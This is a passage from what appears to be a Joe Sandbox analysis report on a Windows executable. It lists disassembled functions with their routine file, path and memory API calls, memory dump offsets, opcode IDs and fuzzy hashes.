                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: e1cf4ba428bc50e2a81e95ebf6ca8d5f44953bc8085315c1ecb2e3ca1a57b3ec
                • Instruction ID: 02dce4090b0b37498338742f099fb27fdac32a6b4e6b7b4a63ea2434388f3072
                • Opcode Fuzzy Hash: e1cf4ba428bc50e2a81e95ebf6ca8d5f44953bc8085315c1ecb2e3ca1a57b3ec
                • Instruction Fuzzy Hash: 93113A31204B05DFD7308E15C880F67B7E9EF46364F10C46EE9BA87A52C771A945CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA41E6 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                Download Yara Rule
                APIs
                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BA33E9,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BA4227
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FullNamePath_wcslen
                • String ID:
                • API String ID: 4019309064-0
                • Opcode ID: 08adcdc9b6dacfc39b88c26c609918136fb17efd2fbd54fce9f53a201ecdbc55
                • Instruction ID: 935ba2e5e40d5d18386d07ce1d04859b8dfa1b03cb4e75d746ae047904c91c09
                • Opcode Fuzzy Hash: 08adcdc9b6dacfc39b88c26c609918136fb17efd2fbd54fce9f53a201ecdbc55
                • Instruction Fuzzy Hash: A511A571918208978F51EBA49845FDD73ECEF8A350F0040E5B549D7291DFB4DB848B11
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BCE992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                • Instruction ID: a01541e215eff815b108f948e769fef91ced1bbc7a7b36013fa731a08ff14929
                • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                • Instruction Fuzzy Hash: 58F0F4325006209AC6312AAA9C05F6A72D8DF42330F1007EEF875D72D1EFB4D80286A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD3BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC6A99,?,0000015D,?,?,?,?,00BC85D0,000000FF,00000000,?,?), ref: 00BD3BE2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: bf69b1e9e3ffba2d7b377cd13855238a7b698da9d1f9d1696fe00d8e3c1c806a
                • Instruction ID: 67b79d395b064a6a2722df7a8567e99f60ce27dc4259e88f35e235e2f0812c04
                • Opcode Fuzzy Hash: bf69b1e9e3ffba2d7b377cd13855238a7b698da9d1f9d1696fe00d8e3c1c806a
                • Instruction Fuzzy Hash: 5EE0E53120461057D6302776AC00F5AF6C9DB41FA0F1901E3AC0BE6292FB61DD4081E2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BF5004 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: 843dbf7b8762258c56f7d9dcebe128bfb781e12d29dde487829574cdca971c47
                • Instruction ID: 3892240e459b8170d0ca8bd6ed41d768b1ee047c3790b4a7a134dd1709c0e132
                • Opcode Fuzzy Hash: 843dbf7b8762258c56f7d9dcebe128bfb781e12d29dde487829574cdca971c47
                • Instruction Fuzzy Hash: E2F06D72A142148BCF20EFD8D880BFEF7F4FF05351F5044A9E899EB240D6B298508B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA63DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 27426454a88459cf8e64226ba1b92469b027ed3354fed407b8cc660247b67d5c
                • Instruction ID: b528d57329d5dae4be20753fcfd892a05469b94ebf918ce0949af9d966c899c3
                • Opcode Fuzzy Hash: 27426454a88459cf8e64226ba1b92469b027ed3354fed407b8cc660247b67d5c
                • Instruction Fuzzy Hash: 3FF0A9B0004B02CFCB348F24D490916BBE0FF1432A32889BEE1D782620CB31A840CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BF6A79 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: f237390775eaf5f0252c35a09a3bc30ccdae1f24c2ee1c4e8491d9ff264efd52
                • Instruction ID: 37036a99524b81e4b62c0f68558cb2c21d1276321590a085f2c57cc1730dbeb0
                • Opcode Fuzzy Hash: f237390775eaf5f0252c35a09a3bc30ccdae1f24c2ee1c4e8491d9ff264efd52
                • Instruction Fuzzy Hash: 8AF0E571B246485BD7205A799816BF2F7D4FB10314F1488DAD9D583181C7F154A89752
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0D4BF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                Download Yara Rule
                APIs
                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00BE41AF,00C64600,00000002), ref: 00C0D4E6
                  • Part of subcall function 00C0D3F7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00C0D4D9,?,?,?), ref: 00C0D419
                  • Part of subcall function 00C0D3F7: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00C0D4D9,?,?,?,?,00BE41AF,00C64600,00000002), ref: 00C0D42E
                  • Part of subcall function 00C0D3F7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00C0D4D9,?,?,?,?,00BE41AF,00C64600,00000002), ref: 00C0D43A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: File$Pointer$Write
                • String ID:
                • API String ID: 3847668363-0
                • Opcode ID: 16f40a18ec970b4acdef6ac0841bf7139a649463c707f38615fa15445252bea9
                • Instruction ID: 9a079d3907c2d42a5b8f4271396bb52fcfef9904ae7cc49e32fe1ebd80986a26
                • Opcode Fuzzy Hash: 16f40a18ec970b4acdef6ac0841bf7139a649463c707f38615fa15445252bea9
                • Instruction Fuzzy Hash: A6E06D76400708EFCB219F9ADC008AAB7F8FF80320710852FE99682120D7B1EA04EF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: __fread_nolock
                • String ID:
                • API String ID: 2638373210-0
                • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                • Instruction ID: 1aa5d6d25b1009ae8030dca5f8f35bfbd7b2f5c1bbf335e06e0514dc5977fc61
                • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                • Instruction Fuzzy Hash: C6F0F87540024DFFDF05DF90C941E9E7BB9FB14318F248489F9259A151D336DA21EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA4154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen
                • String ID:
                • API String ID: 176396367-0
                • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                • Instruction ID: d607839735e379d53deb810f8ba596274b74798a25d1ba520679cf1daf9c43fb
                • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                • Instruction Fuzzy Hash: EAD0A72335201035B669313D2D1BE7F859CCBC36A0B0400BFFA13CA1A5ED444D0300E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0E783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                Download Yara Rule
                APIs
                • GetShortPathNameW.KERNELBASE ref: 00C0E7A2
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: NamePathShort_wcslen
                • String ID:
                • API String ID: 2021730007-0
                • Opcode ID: ee739d0b4a3273112a0240b64b248e7884cb01b4af625516585995867bcc1b0d
                • Instruction ID: e729035a2eee5f6800b5b811e86715da516fffa94828aa9dc1c0773abb95b92c
                • Opcode Fuzzy Hash: ee739d0b4a3273112a0240b64b248e7884cb01b4af625516585995867bcc1b0d
                • Instruction Fuzzy Hash: A1E0CD7250022457C71093599C05FDA77DDDFC8790F0400B0FD05D7258DDA4DD808590
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA39DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                Download Yara Rule
                APIs
                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BA39FD
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: LongNamePath_wcslen
                • String ID:
                • API String ID: 541455249-0
                • Opcode ID: f50187dc905c8c7813d9f7067d6392ef4a70e5f0a66a69e237cf00f9a4387bfc
                • Instruction ID: 0caffac40621da355fda24a7d49cca67362dc07e8d54890e489da5893b5c0afa
                • Opcode Fuzzy Hash: f50187dc905c8c7813d9f7067d6392ef4a70e5f0a66a69e237cf00f9a4387bfc
                • Instruction Fuzzy Hash: 24E0C272A002245BCB20A3989C0AFEA77EDDFC8790F0400B1FD09E7258DEA4ED809690
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BF4941 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: f8b668d711fd4c57044550f3be836e8b22db3b0fceaf675bffcbec47cbeac82e
                • Instruction ID: 1d54b6228eb262387f41ef246cef672d447bfc1624ed61246b475f9243727117
                • Opcode Fuzzy Hash: f8b668d711fd4c57044550f3be836e8b22db3b0fceaf675bffcbec47cbeac82e
                • Instruction Fuzzy Hash: 33E08672F1411997CF20EAE4E881BFEB3F4FB11352F1401A5E945FA110C6729C5186A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0E753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                Download Yara Rule
                APIs
                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C0E76C
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FolderPath_wcslen
                • String ID:
                • API String ID: 2987691875-0
                • Opcode ID: 84fcd101d5ace3aeb357bcecea3adcab4a9fe66039b5ebadd9dbbb367dfadfd1
                • Instruction ID: 5a11b0e2296280dd3bd5e79f427a30bc174b173d12f13440ab48894feae26ce2
                • Opcode Fuzzy Hash: 84fcd101d5ace3aeb357bcecea3adcab4a9fe66039b5ebadd9dbbb367dfadfd1
                • Instruction Fuzzy Hash: 50D05EA29002283BDF60A674AC0DEBB3AACC744210F0006A0786ED3252ED34ED4486A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA7953 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00BE3A1C), ref: 00BA7973
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 0dbd77d3096ffb8383940e9a0ebc0b15eff461cc2cd4b59b62c37e2e97cd02b4
                • Instruction ID: 753dd85ad6e04778ddef2b97864b2a2be0bd846032d83635f5b7980d7c5ebb27
                • Opcode Fuzzy Hash: 0dbd77d3096ffb8383940e9a0ebc0b15eff461cc2cd4b59b62c37e2e97cd02b4
                • Instruction Fuzzy Hash: 8BE09275448B12DFC3314F1AE844412FBF4FED23613204A6FD0E682660D7B0588ACB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0DA5C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                Download Yara Rule
                APIs
                • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00C0D9DC,?,?), ref: 00C0DA72
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CopyFile
                • String ID:
                • API String ID: 1304948518-0
                • Opcode ID: d16af49e4a81f0b7475142c2e47fb9a1f9bf9837e4806787f43f99bf6e757518
                • Instruction ID: 224b21ac0a48a52f540eaff3da10f75c105551d6374014f829aa86ec451c5b77
                • Opcode Fuzzy Hash: d16af49e4a81f0b7475142c2e47fb9a1f9bf9837e4806787f43f99bf6e757518
                • Instruction Fuzzy Hash: 1FD0C7305D0209BBEF509B51DD07F9DB76CE711B45F104194B101EA0D0D7B5A9199765
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BE073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,00000000,?,00BE0AA4,?,?,00000000,?,00BE0AA4,00000000,0000000C), ref: 00BE0757
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
